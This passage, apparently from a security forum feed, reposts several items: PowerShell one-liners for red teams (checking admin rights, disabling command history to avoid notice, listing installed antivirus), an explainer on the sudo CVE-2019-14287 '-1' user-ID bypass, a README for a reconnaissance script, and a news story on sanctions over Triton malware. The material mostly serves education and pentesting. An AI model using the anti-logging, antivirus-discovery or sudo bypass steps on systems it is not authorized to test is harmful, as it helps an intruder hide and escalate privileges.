and host them somewhere on your own. Get SID of the current user The following command will return SID value of the current user: ([System.Security.Principal.WindowsIdentity]::GetCurrent()).User.Value Check if we are running with elevated (admin) privileges Here’s a quick one-liner for checking whether we are running elevated PowerShell session with Administrator privileges: If (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) { echo "yes"; } else { echo "no"; } Disable PowerShell command logging By default, PowerShell automatically logs up to 4096 commands in the history file, similarly as Bash does on Linux. The PowerShell history file is a plaintext file located in each users’ profile in the following location: C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt With the following command(s) we can disable the PowerShell command logging functionality in the current shell session: Set-PSReadlineOption –HistorySaveStyle SaveNothing or Remove-Module PSReadline This can be useful in red team exercises if we want to minimize our footprint on the system. From now on, no command will be recorded in the PowerShell history file. Note however that the above command(s) will still be echoed in the history file, so be aware that this is not completely covert. List installed antivirus (AV) products Here’s a simple PowerShell command to query Security Center and identify all installed Antivirus products on this computer: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct By decoding the productState value, we can identify which AV is currently enabled (in case there is more than one installed), whether the signatures are up-to-date and even which AV features and scanning engines are enabled (e.g. real-time protection, anti-spyware, auto-update etc.). This is however quite an esoteric topic without a simple solution. Here are some links on the topic: https://mspscripts.com/get-installed-antivirus-information-2/ https://jdhitsolutions.com/blog/powershell/5187/get-antivirus-product-status-with-powershell/ https://stackoverflow.com/questions/4700897/wmi-security-center-productstate-clarification/4711211 https://docs.microsoft.com/en-us/windows/win32/api/iwscapi/ne-iwscapi-wsc_security_product_state https://social.msdn.microsoft.com/Forums/pt-BR/6501b87e-dda4-4838-93c3-244daa355d7c/wmisecuritycenter2-productstate Conclusion Hope you will find this collection useful during your pentests sometimes. Please leave a comment with YOUR favorite one-liner. For other interesting commands, check out our pure PowerShell infosec reference or have a look on our collection of minimalistic offensive security tools on github. Source: infosecmatter.com
  19. Over the past few days, news of CVE-2019-14287 — a newly discovered open source vulnerability in Sudo, Linux’s popular command tool has been grabbing quite a few headlines. Since vulnerabilities in widespread and established open source projects can often cause a stir, we decided to present you with a quick cheat sheet to let you know exactly what the fuss is about. Here is everything you need to know about the Sudo vulnerability, how it works, and how to handle the vulnerable Sudo component, if you find that you are currently at risk. Why Is The New Sudo Security Vulnerability (CVE-2019-14287) Making Waves? Let’s start with the basics. Sudo is a program dedicated to the Linux operating system, or any other Unix-like operating system, and is used to delegate privileges. For example, it can be used by a local user who wants to run commands as root — the windows equivalent of admin user. On October 14, the Sudo team published a security alert about CVE-2019-14287, a new security issue discovered by Joe Vennix of Apple Information Security, in all Sudo versions prior to version 1.8.28. The security flaw could enable a malicious user to execute arbitrary commands as root user even in cases where the root access is disallowed. Considering how widespread Sudo usage is among Linux users, it’s no surprise that everybody’s talking about the security vulnerability. The Sudo Vulnerability Explained That’s the scary version, and when we think about how powerful and popular Sudo is, CVE-2019-14287 should not be ignored. That said, it’s also important to note that the vulnerability is relevant in a specific configuration in the Sudo security policy, called “sudoers”, which helps ensure that privileges are limited only to specific users. The issue occurs when a sysadmin inserts an entry into the sudoers file, for example: jacob myhost = (ALL, !root) /usr/bin/chmod This entry means that user jacob is allowed to run “chmod” as any user except the root user, meaning a security policy is in place in order to limit access — sounds good, right? Unfortunately, Joe Vennix from Apple Information Security found that the function fails to parse all values correctly and when giving the parameter user id “-1” or its unsigned number “4294967295”, the command will run as root, bypassing the security policy entry we set in the example above. In the example below, when we run the “-1” user ID, we get the id number “0” which is the root user value: Stay Secure: Keep Calm And Update Your Sudo Version And now for some good news: the Sudo team has already released a secure version, so If you are using this particular security configuration, make sure to update to version 1.8.28 or over. In addition, as you can see, the Sudo vulnerability only occurs in a very specific configuration. As is often the case when newly disclosed security vulnerabilities in popular open source projects make a splash, there’s no need to panic. While Sudo is an extremely popular and widely used project, the vulnerability is only relevant in a specific scenario, and it has already been fixed in the updated version. Our best advice is to keep calm, and make sure you update your open source software components. Via whitesourcesoftware.com
  20. https://octopus.com/blog/public-bug-bounty
  21. dude, sunt cel putin 10 autoturisme hybrid intr-un oras cu cateva k de locuitori, le poti inveli in celule pana la urmatoarea statie
  22. Kev

    EasyRecon

    EasyRecon is a script that do the initial reconnaissance of target automatically. To scan Google, simply run: $ ./easyRecon.sh google.com Setup To install EasyRecon, clone this repository. EasyRecon relies on a couple of tools to be installed so make sure you have them: subfinder httprobe waybackurls Please make sure that as most of these tools are written in Go, that you have Go installed and configured properly. Make sure that when you type any of the above commands in the terminal, they are recognized and work. Usage $ ./easyRecon.sh example.com Features Enumerate all the existing domains with subfinder Seperate live domains from all existing domains httprobe Spider the target and save all the URLS of target using waybackurls grep all the js files and endpoints from the target Download easyrecon-main.zip or git clone https://github.com/cspshivam/easyrecon.git Source
  23. “Petrochemical plant” The Treasury Department for the first time levied sanctions for an ICS cyberattack. (CC BY-NC-ND 2.0) The Treasury Department’s Office of Foreign Assets Control sanctioned a Russian government research institution linked to Triton malware targeting industrial safety systems, the first time the U.S. took such an action for an industrial control system attack. Treasury Secretary Steve Mnuchin called out the Russian government for continuing “to engage in dangerous cyber activities aimed at the U.S. and its allies.” The State Research Center of the Russian Federation FGUP Central Scientific Research Institute of Chemistry and Mechanics built the tools behind a 2017 Triton attack on a petrochemical facility in the Middle East. The malware, also known as Trisis and Hatman, has been used against U.S. partners in the Middle East, and the agency said in a release that Triton hackers have been reportedly scanning and probing U.S. facilities. “An OFAC sanction by the U.S. Treasury is significant and compelling; not only will it impact this research institution in Russia, but anyone working with them will have their ability to be successful on the international stage severely hampered,” said Robert Lee, CEO and co-founder of Dragos, Inc. “The most important aspect of this development, however, is the attribution to Russia for the Trisis attack by the USG officially and the explicit call out of industrial control systems in the sanction,” said Lee. “This is a norm setting moment and the first time an ICS cyberattack has ever been sanctioned.” He called the sanction “entirely appropriate” since the cyberattack on the petrochemical attack “was the first ever targeted explicitly towards human life. We are fortunate no one died and I’m glad to see governments take a strong stance condemning such attacks.” Via scmagazine.com
×
×
  • Create New...